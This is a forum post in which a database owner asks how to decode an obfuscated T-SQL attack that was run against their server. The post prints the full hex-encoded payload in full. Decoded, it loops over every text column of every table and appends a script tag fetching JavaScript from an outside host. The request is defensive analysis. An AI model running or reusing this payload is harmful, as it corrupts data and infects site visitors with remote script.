Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!
Here's the code:
DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004 50043004C004100 520045002000400 054002000760061 007200630068006 100720028003200 3500350029002C0 040004300200076 006100720063006 800610072002800 320035003500290 020004400450043 004C00410052004 500200054006100 62006C0065005F0 043007500720073 006F00720020004 300550052005300 4F0052002000460 04F005200200073 0065006C0065006 300740020006100 2E006E0061006D0 065002C0062002E 006E0061006D006 500200066007200 6F006D002000730 0790073006F0062 006A00650063007 400730020006100 2C0073007900730 063006F006C0075 006D006E0073002 000620020007700 680065007200650 0200061002E0069 0064003D0062002 E00690064002000 61006E006400200 061002E00780074 007900700065003 D00270075002700 200061006E00640 02000280062002E 007800740079007 00065003D003900 390020006F00720 0200062002E0078 007400790070006 5003D0033003500 20006F007200200 062002E00780074 007900700065003 D00320033003100 20006F007200200 062002E00780074 007900700065003 D00310036003700 290020004F00500 045004E00200054 00610062006C006 5005F0043007500 720073006F00720 020004600450054 004300480020004 E00450058005400 2000460052004F0 04D002000200054 00610062006C006 5005F0043007500 720073006F00720 0200049004E0054 004F00200040005 4002C0040004300 200057004800490 04C004500280040 004000460045005 400430048005F00 530054004100540 0550053003D0030 002900200042004 500470049004E00 200065007800650 063002800270075 007000640061007 400650020005B00 27002B004000540 02B0027005D0020 007300650074002 0005B0027002B00 400043002B00270 05D003D00720074 00720069006D002 80063006F006E00 760065007200740 028007600610072 006300680061007 2002C005B002700 2B00400043002B0 027005D00290029 002B00270027003 C00730063007200 690070007400200 07300720063003D 006800740074007 0003A002F002F00 7700770077002E0 06B0069006C006C 0077006F0077003 1002E0063006E00 2F0067002E006A0 073003E003C002F 007300630072006 900700074003E00 270027002700290 046004500540043 00480020004E004 500580054002000 460052004F004D0 020002000540061 0062006C0065005 F00430075007200 73006F007200200 049004E0054004F 002000400054002 C00400043002000 45004E004400200 043004C004F0053 004500200054006 10062006C006500 5F0043007500720 073006F00720020 004400450041004 C004C004F004300 410054004500200 05400610062006C 0065005F0043007 500720073006F00 7200
AS NVARCHAR(4000)) ;
EXEC(@S);